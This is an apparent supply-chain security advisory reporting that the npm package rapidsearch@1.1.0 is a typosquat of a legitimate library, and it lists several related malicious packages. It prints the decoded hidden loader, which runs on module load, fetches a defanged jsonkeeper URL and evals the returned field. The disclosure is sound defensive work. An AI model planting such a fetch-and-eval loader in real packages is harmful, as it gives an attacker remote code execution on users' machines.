rapidsearch@1.1.0
Malicious code in rapidsearch (npm)
Analysis
Package impersonates the legitimate rapidsearch library by mscdex ([account]) but is published by a different email ([account]) who also published the known typosquat multer-express. The main module lib/sbmh.js ships a base64-encoded string that decodes to `fetch('hxxps://jsonkeeper[.]com/b/9NXQ0').then(r=>r.json()).then(d=>{eval(d.ret);});`. This code runs at module load time (require()), fetches a JSON payload from jsonkeeper[.]com, and evals the '.ret' field — a remote code execution vector delivering an attacker-controlled second-stage payload from an external pastebin-like host.
- analyzed by
- Leitwacht
- first seen
- Jun 12, 2026, 07:38 PM
- analyzed
- Jun 12, 2026, 07:39 PM
Related advisories
- protectstraizolib@1.0.8
- polymarket-onchain-plugin@2.1.3
- pino-pretty-logs@1.1.0
- npm-scanner@1.0.0
- mjs-biginteger@5.0.6
- log-input@1.0.5
- events-runtime@3.2.1
- solana-web3-stable@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.